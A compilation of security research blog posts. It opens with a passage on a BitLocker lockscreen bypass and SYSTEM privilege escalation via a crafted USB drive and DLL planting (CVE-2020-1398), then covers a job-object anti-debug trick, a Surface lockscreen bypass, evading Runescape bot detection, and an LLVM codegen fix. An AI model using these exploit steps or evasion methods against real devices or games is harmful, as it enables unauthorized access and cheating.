Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targeting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted, the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allow us to create a subdirectory:

amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.657_none_e6c5b579130e3898

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

For the ClientRecoveryPasswordRotation exploit to work, a symbolic link is required in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so it can survive a logout/login if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device:

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
-----
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

C:\Users\jonas>d:
D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.

Patch

I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Process on a diet: anti-debug using job objects

By: jm
20 January 2021 at 23:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less than or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as the API goes, it is pretty simple: creation does not really stand out from other object creation. The only other APIs you will really touch are NtAssignProcessToJobObject, whose name is self-explanatory, and NtSetInformationJobObject, through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to do is create a job object, assign the process to it, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

// Zero-initialise so the fields we do not set are not left as stack garbage.
JOBOBJECT_EXTENDED_LIMIT_INFORMATION limits = {};
limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and the like?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process when placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.
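One way to read the results above is as plain commit accounting: anything that needs new private memory is refused, while writes to memory that is already private cost nothing extra. The sketch below is a toy model of that reading and not the Windows API; `CommitBudget`, `kPage` and the helper names are hypothetical, and the claim that thread creation and patching a shared page both require fresh private commit is an assumption about how the limit ends up affecting debuggers.

```cpp
#include <cstddef>

// Toy model of a per-process commit limit. This is NOT the Windows API.
struct CommitBudget {
    std::size_t limit;      // hypothetical stand-in for ProcessMemoryLimit
    std::size_t committed;  // private bytes already charged to the process

    // A request succeeds only if the total stays at or below the limit.
    bool try_commit(std::size_t bytes) {
        if (bytes > limit || committed > limit - bytes) {
            return false;   // over budget: the request is refused
        }
        committed += bytes;
        return true;
    }
};

constexpr std::size_t kPage = 0x1000;

// Assumption: a new thread needs at least one freshly committed page.
inline bool can_create_thread(CommitBudget& b) { return b.try_commit(kPage); }

// Assumption: patching a shared (non-private) page forces a private copy,
// which is charged against the budget.
inline bool can_patch_shared_page(CommitBudget& b) { return b.try_commit(kPage); }

// A page that is already private has been paid for, so patching it is free.
inline bool can_patch_private_page(const CommitBudget&) { return true; }
```

With a limit of 0x1000 and a couple of megabytes already committed, both `can_create_thread` and `can_patch_shared_page` fail in this model, while `can_patch_private_page` still succeeds, which mirrors the caveat about private pages.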

Conclusion

Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for a password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”.

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload

Constraints

To exploit this vulnerability, you will need:

  1. A Surface touchscreen device. I used a Surface Book 2 15" (running up-to-date Windows 10 20H2 with BitLocker enabled).
  2. An external keyboard.
  3. A flash drive containing your payload.

Keyboard confusion

By connecting an external keyboard to our Surface device, we gain the ability to use both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.

Narration

Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by pressing Windows+U and selecting “Enable narrator”.

I forgot my password

A forgotten password is one of the few cases where you would do anything other than log in on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on-screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left; choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”.

Navigating settings

You wouldn’t think you could do much with a hidden settings window on a locked Windows device, but you can actually navigate said window with an external keyboard. While holding down the Caps Lock key, the arrow keys and the Tab key can be used to navigate UI elements.

One weaponization of this is going to AutoPlay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute Windows binaries from a USB thumb drive.

Disclosure

I reported the issue to MSRC, but they dismissed the bug report, citing the need for a PoC, which I had already provided. They also expressed disbelief that the bug was exploitable.

Demonstration

How Runescape catches botters, and why they didn’t catch me

By: vmcall
3 April 2021 at 23:00

Player automation has always been a big concern in MMORPGs such as World of Warcraft and Runescape, and this kind of game-hacking is very different from traditional cheats in, for example, shooter games.

One weekend, I decided to take a look at the detection systems put in place by Jagex to prevent player automation in Runescape.

Botting

For the past months, an account named sch0u has been playing on world 67 around the clock doing mundane tasks such as killing mobs or harvesting resources. At first glance, this account looks just like any other player, but there is one key difference: it’s a bot.

I started this bot back in October with the goal of testing the limits of their bot detection system. I tried to find information online on how Jagex combats these botters, and only found videos of commercial bots bragging about how their mouse movement systems are indistinguishable from humans.

Therefore, the only thing I could deduce was that mouse movement matters, or does it?

Heuristics!

I started by analyzing the Runescape client to confirm this theory, and quickly noticed a global called hhk that is set shortly after launch.

const auto module_handle = GetModuleHandleA(0);
hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

This installs a low level hook on the mouse by appending to the system-wide hook chain. This allows applications on Windows to intercept all mouse events, whether or not the events are related to your application. Low level hooks are frequently used by keyloggers, but have legitimate use cases such as heuristics like the aforementioned mouse hook.

The Runescape mouse handler is quite simple in its essence (the following pseudocode has been beautified by hand):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam)
{
  if ( rs::client::singleton )
  {
      // Call the internal logging handler
      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);
  }
  // Pass the information to the next hook on the system
  return CallNextHookEx(hhk, code, wParam, lParam);
}
void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam)
{
  // If the mouse event happens outside of the Runescape window, don't log it.
  if (!window_ctx->event_inside_of_window(lparam))
  {
    return;
  }

  switch (wparam)
  {
    case WM_MOUSEMOVE:
      rs::heuristics::log_movement(lparam);
      break;
    
    case WM_LBUTTONDOWN:
    case WM_LBUTTONDBLCLK:
    case WM_RBUTTONDOWN:
    case WM_RBUTTONDBLCLK:
    case WM_MBUTTONDOWN:
    case WM_MBUTTONDBLCLK:
      rs::heuristics::log_button(lparam);
      break;
  }
}

For bandwidth reasons, these rs::heuristics::log_* functions use simple algorithms to skip event data that resembles previously logged events.
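The exact filtering used by the client is not shown here, so the following is only a guess at what such a skip rule could look like: a sample is dropped when it is both close in position and close in time to the last stored one. `MouseSample`, `MovementLog` and both thresholds are hypothetical names and values, not anything recovered from the game.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <vector>

// Hypothetical event record; the real layout used by the client is unknown.
struct MouseSample {
    std::int32_t x;
    std::int32_t y;
    std::uint32_t time_ms;
};

class MovementLog {
public:
    MovementLog(std::int32_t min_distance, std::uint32_t min_interval_ms)
        : min_distance_(min_distance), min_interval_ms_(min_interval_ms) {}

    // Returns true if the sample was stored, false if it was skipped
    // because it resembles the previously stored sample.
    bool log(const MouseSample& s) {
        if (!samples_.empty()) {
            const MouseSample& last = samples_.back();
            const bool close_in_space =
                std::abs(s.x - last.x) < min_distance_ &&
                std::abs(s.y - last.y) < min_distance_;
            const bool close_in_time =
                (s.time_ms - last.time_ms) < min_interval_ms_;
            if (close_in_space && close_in_time) {
                return false;
            }
        }
        samples_.push_back(s);
        return true;
    }

    std::size_t size() const { return samples_.size(); }

private:
    std::int32_t min_distance_;
    std::uint32_t min_interval_ms_;
    std::vector<MouseSample> samples_;
};
```

A filter of this shape keeps sharp movements and pauses while discarding the near-duplicate samples that a slowly moving cursor would otherwise produce.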

This event data is later parsed by the function rs::heuristics::process, which is called every frame by the main render loop.


void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine)
{
  // Don't process any data if the player is not in a world
  auto client = heuristic_engine->client;
  if (client->state != STATE_IN_GAME)
  {
    return;
  }

  // Make sure the connection object is properly initialised
  auto connection = client->network->connection;
  if (!connection || connection->server->mode != SERVER_INITIALISED)
  {
    return;
  }

  // The following functions parse and pack the event data, which is later
  // sent by a separate networking component that has a queue system for
  // packets.

  // Process data gathered by internal handlers
  rs::heuristics::process_source(&heuristic_engine->event_client_source);

  // Process data gathered by the low level mouse hook
  rs::heuristics::process_source(&heuristic_engine->event_hook_source);
}

Away from keyboard?

While reversing, I put effort into understanding the relevance of the function I am looking at, primarily by hooking or patching the function in question. You can usually deduce the relevance of a function by rendering it useless and observing the state of the software, and this methodology led to an interesting observation.

By preventing the game from calling the function rs::heuristics::process, I didn’t immediately notice anything, but after exactly five minutes, I was logged out of the game. Apparently, Runescape decides whether a player is inactive solely by looking at the heuristic data sent to the server by the client, even though you can play the game just fine. This raised a new question: if the server doesn’t think I am playing, does it think I am botting?
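The server side is not visible from the client, so the following is purely a hypothetical model of the observed behaviour: only heuristic packets refresh the idle timer, and ordinary gameplay packets do not. `ActivityTracker` and its method names are made up for illustration; the five-minute timeout is the one value taken from the observation above.

```cpp
#include <cstdint>

// Hypothetical server-side idle tracking that matches the observation:
// only heuristic packets count as signs of life.
class ActivityTracker {
public:
    explicit ActivityTracker(std::uint64_t timeout_ms)
        : timeout_ms_(timeout_ms) {}

    // Mouse heuristic data arrived: the player is considered active.
    void on_heuristic_packet(std::uint64_t now_ms) { last_seen_ms_ = now_ms; }

    // Any other packet (movement, combat, ...) deliberately changes nothing.
    void on_gameplay_packet(std::uint64_t /*now_ms*/) {}

    bool should_log_out(std::uint64_t now_ms) const {
        return now_ms - last_seen_ms_ >= timeout_ms_;
    }

private:
    std::uint64_t timeout_ms_;
    std::uint64_t last_seen_ms_ = 0;
};
```

In this model a client that keeps sending gameplay packets but never sends heuristic data is logged out after the timeout, which is the behaviour described above.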

This led to spending a few days reverse engineering the networking layer of the game, which resulted in my ability to bot almost anything using only network packets.

To prove my theory, I botted twenty four hours a day, seven days a week, without ever moving my mouse. After doing this for thousands of hours, I can safely state that their bot detection either relies on the heuristic event data sent by the client, or is only run when the player is not “afk”. Any player that manages to play without moving their mouse should be banned immediately, thus making this oversight worth revisiting.

A look at LLVM - comparing clamp implementations

By: duk
9 April 2021 at 00:00

Please note that this is not an endorsement or criticism of either of these languages. It’s simply something I found interesting with how LLVM handles code generation between the two. This is an implementation quirk, not a language issue.

Update (April 9, 2021): A bug report was filed and a fix was pushed!

The LLVM project is a modular set of tools that make designing and implementing a compiler significantly easier. The most well known part of LLVM is their intermediate representation; IR for short. LLVM’s IR is an extremely powerful tool, designed to make optimization and targeting many architectures as easy as possible. Many tools use LLVM IR; the Clang C++ compiler and the Rust compiler (rustc) are both notable examples. However, despite this unified architecture, code generation can still vary wildly between implementations and how the IR is used. Some time ago, I stumbled upon this tweet discussing Rust’s implementation of clamping compared to C++:

Rust 1.50 is out and has f32.clamp. I had extremely low expectations for performance based on C++ experience but as usual Rust proves to be "C++ done right".

Of course Zig already has clamp and also gets codegen right. pic.twitter.com/0WI1fLrQaB

— Arseny Kapoulkine (@zeuxcg) February 11, 2021

Rust’s code generation on the latest version of LLVM is far superior compared to an equivalent Clang version using std::clamp, even though they use the same underlying IR:

With f32.clamp:

pub fn clamp(v: f32) -> f32 {
    v.clamp(-1.0, 1.0)
}

The corresponding assembly is shown below. It is short, concise, and pretty much the best you’re going to get. We can see two memory accesses to get the clamp bounds and efficient use of x86 instructions.

.LCPI0_0:
        .long   0xbf800000
.LCPI0_1:
        .long   0x3f800000
example::clamp:
        movss   xmm1, dword ptr [rip + .LCPI0_0]
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI0_1]
        minss   xmm0, xmm1
        ret

Next is a short C++ program using std::clamp:

#include <algorithm>
float clamp2(float v) {
    return std::clamp(v, -1.f, 1.f);
}

The corresponding assembly is shown below. It is significantly longer with many more data accesses, conditional moves, and is in general uglier.

.LCPI1_0:
        .long   0x3f800000                        # float 1
.LCPI1_1:
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0
        mov     dword ptr [rsp - 8], -1082130432  
        mov     dword ptr [rsp - 12], 1065353216  
        ucomiss xmm0, dword ptr [rip + .LCPI1_0]  
        lea     rax, [rsp - 12]
        lea     rcx, [rsp - 4]
        cmova   rcx, rax
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0
        lea     rax, [rsp - 8]
        cmovbe  rax, rcx
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret

Interestingly enough, reimplementing std::clamp causes this issue to disappear:

float clamp(float v, float lo, float hi) {
    v = (v < lo) ? lo : v;
    v = (v > hi) ? hi : v;
    return v;
}

float clamp1(float v) {
    return clamp(v, -1.f, 1.f);
}

The assembly generated here is the same as with Rust’s implementation:

.LCPI0_0:
        .long   0xbf800000                        # float -1
.LCPI0_1:  
        .long   0x3f800000                        # float 1
clamp1(float):                                    # @clamp1(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0 
        movss   xmm0, dword ptr [rip + .LCPI0_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret

Clearly, something is off between std::clamp and our implementation. According to the C++ reference, std::clamp takes two references along with a predicate (which defaults to std::less) and returns a reference. Functionally, the only difference between our code and std::clamp is that we do not use reference types. Knowing this, we can then reproduce the issue.

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

Once again, we’ve generated the same bad code as with std::clamp:

.LCPI1_0:
        .long   0x3f800000                        # float 1
.LCPI1_1: 
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0 
        mov     dword ptr [rsp - 8], -1082130432 
        mov     dword ptr [rsp - 12], 1065353216 
        ucomiss xmm0, dword ptr [rip + .LCPI1_0] 
        lea     rax, [rsp - 12] 
        lea     rcx, [rsp - 4] 
        cmova   rcx, rax 
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0 
        lea     rax, [rsp - 8] 
        cmovbe  rax, rcx 
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero
        ret
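The reference-returning behaviour that separates std::clamp from the by-value version can be observed directly by comparing addresses. This is a small sketch for illustration; `Picked` and `which_object` are hypothetical helper names.

```cpp
#include <algorithm>
#include <cassert>

enum class Picked { Value, Low, High };

// Reports which of the three argument objects std::clamp returned a
// reference to, by comparing addresses rather than values.
inline Picked which_object(const float& v, const float& lo, const float& hi) {
    assert(!(hi < lo));  // std::clamp requires lo <= hi
    const float* result = &std::clamp(v, lo, hi);
    if (result == &lo) return Picked::Low;
    if (result == &hi) return Picked::High;
    return Picked::Value;
}
```

Because the result is the address of one of the arguments, all three values must exist in memory somewhere unless the optimizer can prove otherwise, which is exactly the part that goes wrong here.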

LLVM IR and Clang

LLVM IR is a Static Single Assignment (SSA) intermediate representation. What this means is that every variable is only assigned to once. In order to represent conditional assignments, SSA form uses a special type of instruction called a “phi” node, which picks a value based on the block that was previously running. However, Clang does not initially use phi nodes. Instead, to make initial code generation easier, variables in functions are allocated on the stack using alloca instructions. Reads and assignments to the variable are load and store instructions to the alloca, respectively:

int main() {
    float x = 0;
}

In this unoptimized IR, we can see an alloca instruction that then has the float value 0 stored to it:

define dso_local i32 @main() #0 {
  %1 = alloca float, align 4
  store float 0.000000e+00, float* %1, align 4
  ret i32 0
}

LLVM will then (hopefully) optimize away the alloca instructions with a relevant pass, like SROA.
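To make the phi node description more concrete, here is a function with a conditional assignment. The IR in the comments is a hand-written approximation rather than real compiler output; an actual build may well fold this into a select instead of a phi.

```cpp
// `x` is assigned on two different paths, which SSA cannot express with a
// single definition.
int pick(bool c) {
    int x;
    if (c) {
        x = 1;
    } else {
        x = 2;
    }
    return x;
}

// Unoptimized, Clang keeps `x` in an alloca: each branch stores to it and
// the return loads from it.
//
// Once the alloca is promoted to a register, the merge point needs a phi
// to choose the value based on the predecessor block, roughly:
//
//   merge:
//     %x = phi i32 [ 1, %then ], [ 2, %else ]
//     ret i32 %x
```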

LLVM IR and reference types

Reference types are represented as pointers in LLVM IR:

void test(float& x2) {
    x2 = 1;
}

In this optimized IR, we can see that the reference has been converted to a pointer with specific attributes.

define dso_local void @_Z4testRf(float* nocapture nonnull align 4 dereferenceable(4) %0) local_unnamed_addr #0 {
  store float 1.000000e+00, float* %0, align 4, !tbaa !2
  ret void
}

When a function is given a reference type as an argument, it is passed the underlying object’s address instead of the object itself. Also passed is some metadata about reference types. For example, nonnull and dereferenceable are set as attributes to the argument because the C++ standard dictates that references always have to be bound to a valid object. For us, this means the alloca instructions are passed directly to the clamp function:

__attribute__((noinline)) const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

In this optimized IR, we can see alloca instructions passed to bad_clamp corresponding to the variables passed as references.

define linkonce_odr dso_local nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %0, float* nonnull align 4 dereferenceable(4) %1, float* nonnull align 4 dereferenceable(4) %2) local_unnamed_addr #2 comdat {
  %4 = load float, float* %0, align 4
  %5 = load float, float* %1, align 4
  %6 = fcmp olt float %4, %5
  %7 = load float, float* %2, align 4
  %8 = fcmp ogt float %4, %7
  %9 = select i1 %8, float* %2, float* %0
  %10 = select i1 %6, float* %1, float* %9
  ret float* %10
}

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #1 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4
  store float -1.000000e+00, float* %3, align 4
  store float 1.000000e+00, float* %4, align 4                                                                                                                                         
  %6 = call nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %2, float* nonnull align 4 dereferenceable(4) %3, float* nonnull align 4 dereferenceable(4) %4)
  %7 = load float, float* %6, align 4
  ret float %7
}

Lifetime annotations are omitted to make the IR a bit clearer.

In this example, the noinline attribute was used to demonstrate passing references to functions. If we remove the attribute, the call is inlined into the function:

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
}
float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);
}

However, even after optimization, the alloca instructions are still there for seemingly no good reason. These alloca instructions should have been optimized away by LLVM’s passes; they’re not used anywhere else and there are no tricky stores or lifetime problems.

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #0 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4, !tbaa !2
  store float -1.000000e+00, float* %3, align 4, !tbaa !2
  store float 1.000000e+00, float* %4, align 4, !tbaa !2
  %5 = fcmp olt float %0, -1.000000e+00
  %6 = fcmp ogt float %0, 1.000000e+00
  %7 = select i1 %6, float* %4, float* %2
  %8 = select i1 %5, float* %3, float* %7
  %9 = load float, float* %8, align 4, !tbaa !2
  ret float %9
}

The only candidate here is the two sequential select instructions, as they operate on the pointers created by the alloca instructions instead of the underlying value. However, LLVM also has a pass for this; if possible, LLVM will try to “speculate” across select instructions that load their results.

select instructions are essentially ternary operators that pick one of the last two operands (float pointers in our case) based on the value of the first operand.

Select speculation - where things go wrong

A few calls down the chain, this function calls isDereferenceableAndAlignedPointer, which is what determines whether a pointer can be dereferenced. The code here exposes the main issue: the select instruction is never considered ‘dereferenceable’. As such, when there are two selects in sequence (as seen with our std::clamp), it will not try to speculate the select instruction and will not remove the alloca.
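The transformation under discussion can be modelled in plain C++. Speculating a select means rewriting "pick a pointer, then load" into "load both, then pick a value", which is only safe when both pointers can be dereferenced unconditionally. The function names below are hypothetical, and this is a model of the idea, not LLVM's implementation.

```cpp
// Models `load (select c, p, q)`: choose a pointer, then load through it.
inline float load_of_select(bool c, const float* p, const float* q) {
    const float* chosen = c ? p : q;
    return *chosen;
}

// Models the speculated form `select c, (load p), (load q)`. Both loads
// run unconditionally, so p and q must both be safe to dereference.
inline float select_of_loads(bool c, const float* p, const float* q) {
    const float a = *p;
    const float b = *q;
    return c ? a : b;
}

// The two chained pointer selects from the inlined reference clamp.
inline float clamp_pointer_form(float v) {
    const float lo = -1.0f, hi = 1.0f;
    const float* inner = (v > hi) ? &hi : &v;
    const float* outer = (v < lo) ? &lo : inner;  // a select of a select
    return *outer;
}

// The same computation after speculating both selects into value selects.
inline float clamp_value_form(float v) {
    const float lo = -1.0f, hi = 1.0f;
    const float inner = select_of_loads(v > hi, &hi, &v);
    return select_of_loads(v < lo, &lo, &inner);
}
```

In `clamp_pointer_form`, the outer choice has another pointer choice as one of its operands. That nested operand is the case the dereferenceability check gives up on, even though every pointer involved refers to a live local.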

Fix 1: libcxx

A potential fix is modifying the original code to not produce select instructions in the same way. For example, we can mimic our original implementation with pointers instead of value types. Though the IR output change is relatively small, this gives us the code generation we want without modifying the LLVM codebase:

const float& better_ref_clamp(const float& v, const float& lo, const float& hi) {
    const float *out;
    out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

float clamp3(float v) {
    return better_ref_clamp(v, -1.f, 1.f);
}

As you can see, the IR generated after the call is inlined is significantly shorter and more efficient than before:

define dso_local float @_Z6clamp3f(float %0) local_unnamed_addr #1 {
  %2 = fcmp olt float %0, -1.000000e+00
  %3 = select i1 %2, float -1.000000e+00, float %0
  %4 = fcmp ogt float %3, 1.000000e+00
  %5 = select i1 %4, float 1.000000e+00, float %3
  ret float %5
}

And the corresponding assembly is back to what we want it to be:

.LCPI1_0:
        .long   0xbf800000                        # float -1
.LCPI1_1:
        .long   0x3f800000                        # float 1
clamp3(float):                                    # @clamp3(float)
        movss   xmm1, dword ptr [rip + .LCPI1_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI1_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1
        ret
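As a quick sanity check, and assuming lo <= hi as std::clamp itself requires, the pointer-based rewrite can be compared against std::clamp by address, so that it is checked to return the same object and not merely an equal value. `same_choice_as_std_clamp` is a hypothetical helper; `better_ref_clamp` is repeated from above so the snippet stands alone.

```cpp
#include <algorithm>
#include <cassert>

// Repeated from the listing above so this snippet is self-contained.
inline const float& better_ref_clamp(const float& v, const float& lo,
                                     const float& hi) {
    const float* out = (v < lo) ? &lo : &v;
    out = (*out > hi) ? &hi : out;
    return *out;
}

// True when both implementations return a reference to the same object.
inline bool same_choice_as_std_clamp(const float& v, const float& lo,
                                     const float& hi) {
    assert(!(hi < lo));  // precondition shared with std::clamp
    return &better_ref_clamp(v, lo, hi) == &std::clamp(v, lo, hi);
}
```

This only exercises a handful of inputs when called in a loop, so it is a smoke test rather than a proof of equivalence.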

Fix 2: LLVM

A much more general approach is fixing the code generation issue in LLVM itself, which could be as simple as this:

diff --git a/llvm/lib/Analysis/Loads.cpp b/llvm/lib/Analysis/Loads.cpp
index d8f954f575838d9886fce0df2d40407b194e7580..affb55c7867f48866045534d383b4d7ba19773a3 100644
--- a/llvm/lib/Analysis/Loads.cpp
+++ b/llvm/lib/Analysis/Loads.cpp
@@ -103,6 +103,14 @@ static bool isDereferenceableAndAlignedPointer(
         CtxI, DT, TLI, Visited, MaxDepth);
   }
 
+  // For select instructions, both operands need to be dereferenceable.
+  if (const SelectInst *SelInst = dyn_cast<SelectInst>(V))
+    return isDereferenceableAndAlignedPointer(SelInst->getOperand(1), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth) &&
+           isDereferenceableAndAlignedPointer(SelInst->getOperand(2), Alignment,
+                                              Size, DL, CtxI, DT, TLI,
+                                              Visited, MaxDepth);
   // For gc.relocate, look through relocations
   if (const GCRelocateInst *RelocateInst = dyn_cast<GCRelocateInst>(V))
     return isDereferenceableAndAlignedPointer(RelocateInst->getDerivedPtr(),

